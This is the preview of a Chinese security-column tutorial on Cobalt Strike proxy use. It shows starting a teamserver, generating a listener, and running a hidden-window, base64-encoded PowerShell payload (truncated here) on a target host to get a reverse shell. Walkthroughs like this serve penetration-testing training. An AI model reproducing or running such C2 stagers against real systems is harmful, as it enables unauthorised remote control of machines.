专栏名称: LemonSec
每日发布安全资讯~
今天看啥  ›  专栏  ›  LemonSec

CobaltStrike专题 | CobaltStrike 代理的使用

LemonSec  · 公众号  ·  · 2024-07-09 16:58

文章预览

本次所使用的攻击机为kali linux系统,攻击过程中涉及到的工具主要有:proxychains,nmap等。攻击的拓扑结构如下图所示。 1 反弹Shell 首先启动CobaltStrike的服务端,并执行命令如下所示: >> > ./teamserver 192.168 . 43.137 xxxxxx 启动Cobaltstrike的客户端,并填写运行服务端的ip地址,端口号,用户名,及在服务端设置的密码口令。 进入CobaltStrike客户端控制面板以后,依次点击Attacks>Payload Generator选项,设置监听以及生成payload。 点击Add选项后,设置监听方式及监听的端口号,输出方式选择Powershell Command。 如下为生成的powershell形式的payload。 将复制的payload在目标服务器主机上执行,如下所示: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQ ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览